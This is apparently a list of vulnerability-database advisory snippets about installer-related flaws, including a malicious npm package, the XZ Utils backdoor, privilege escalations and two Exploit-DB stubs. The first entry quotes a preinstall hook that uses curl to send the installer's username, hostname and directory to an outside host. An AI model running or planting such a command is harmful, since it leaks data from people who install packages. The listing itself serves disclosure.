MAL-2026-4605 Malicious code in mamadoos-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4 package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...

CVE-2026-45539 Microsoft APM: Symlinks under `.apm/prompts/` and `.apm/agents/` are dereferenced during `apm install`, copying host-local file contents into the project tree

Microsoft APM is an open-source, community-driven dependency manager for AI agents. From 0.5.4 to 0.12.4, two primitive integrators in apm-cli enumerate package files with bare Path.glob / Path.rglob calls and read each match with Path.readtext, transparently following symbolic links. A symlink...

uutils coreutils 安全漏洞

uutils coreutils is a cross-platform core command-line toolset developed by Uutils. There is a security vulnerability in uutils coreutils, which stems from a race condition when the -D flag is used in the install process. This could allow attackers with concurrent write privileges to redirect...

EUVD-2026-2749

A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges...

CVE-2023-31403

SAP Business One installation - version 10.0, does not perform proper authentication and authorization checks for SMB shared folder. As a result, any malicious user can read and write to the SMB shared folder. Additionally, the files in the folder can be executed or be used by the installation...

CVE-2025-50063

Vulnerability in Oracle Java SE component: Install. The supported version that is affected is Oracle Java SE: 8u451. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Java SE executes to compromise Oracle Java SE. Successful attacks...

XZ Utils Backdoor

The cybersecurity world got really lucky last week. An intentionally placed backdoor in XZ Utils, an open-source compression utility, was pretty much accidentally discovered by a Microsoft engineer--weeks before it would have been incorporated into both Debian and Red Hat Linux. From ArsTehnica:...

Code injection

Mattermost fails to verify if the requestor is a sysadmin or not, before allowing install requests to the Apps allowing a regular user send install requests to the Apps...

CVE-2023-0975

A vulnerability exists in Trellix Agent for Windows version 5.7.8 and earlier, that allows local users, during install/upgrade workflow, to replace one of the Agent’s executables before it can be executed. This allows the user to elevate their permissions...

PT-2023-1100 · Zoom · Zoom Rooms Installer For Windows

Name of the Vulnerable Software and Affected Versions: Zoom Rooms Installer for Windows versions prior to 5.12.6 Description: The issue is related to a local privilege escalation vulnerability. A local low-privileged user could exploit this vulnerability during the install process to escalate the...

CVE-2022-27904

Automox Agent for macOS before version 39 was vulnerable to a time-of-check/time-of-use TOCTOU race-condition attack during the agent install process...

CVE-2022-27904

Automox Agent for macOS is affected by CVE-2022-27904 due to a time-of-check/time-of-use (TOCTOU) race condition during installation. The issue also involves improper access control on a file used by the PostInstall script, enabling an unprivileged user to obtain root access. Affected versions ar...

PT-2022-18679 · Automox · Automox Agent For Macos

Name of the Vulnerable Software and Affected Versions: Automox Agent for macOS versions prior to 39 Automox Agent for macOS versions prior to 37 Description: The issue is related to a time-of-check/time-of-use TOCTOU race-condition attack that can occur during the agent install process. It also...

Mozilla: Time-of-check time-of-use bug when verifying add-on signatures

A flaw was found in Mozilla. The Mozilla Foundation Security Advisory describes this flaw as follows: When installing an add-on, Firefox verified the signature before prompting the user; but while the user was confirming the prompt, the underlying add-on file could have been modified, and Firefox...

This Stalkerware Delivers Extra-Creepy Features

Researchers are sending up a red flag over the distribution of an aggressive stalkerware app called Monitor Minor. In a report released Monday, researchers said the Android version of the app gives stalkers near absolute control of targeted devices, going so far as allowing them to capture the...

Design/Logic Flaw

ImpressCMS 1.3.10 has XSS via the PATHINFO to htdocs/install/index.php, htdocs/install/pagelangselect.php, or htdocs/install/pagemodcheck.php...

JDK: unspecified vulnerability fixed in 8u171 and 10.0.1 (Install)

Vulnerability in the Java SE component of Oracle Java SE subcomponent: Install. Supported versions that are affected are Java SE: 8u162 and 10. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE...

Sandstorm Server-Side Request Forgery Vulnerability Vulnerability

Sandstorm is a personal cloud platform. The platform features file storage, application management, task and project management, and more. A server-side request forgery vulnerability exists in the install application process in versions prior to Sandstorm build 0.203. A remote attacker can exploi...

X7CHAT 1.3.6b - Add Admin Exploit

No description provided by source. + Author : d4rk-h4ck3r + Email : [email protected] + Site : www.vbspiders.com/vb + Team : Tunisian Security TeaM + Dork : powered by x7 chat 1.3.6b Exploit-DB Notes Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt: After finishing...

ShopEx Single <= 4.5.1 - Multiple Vulnerabilities

No description provided by source. Exploit Title: ShopEx = Single V4.5.1 Multiple Vulnerabilities Date: 30/01/10 Author: cp77fk4r | empty0pageSHIFT+2gmail.com| www.DigitalWhisper.co.il Software Link: http://www.shopex.cn | http://www.shopex.cn/download/ Version: = Single V4.5.1 Tested on: PHP Cro...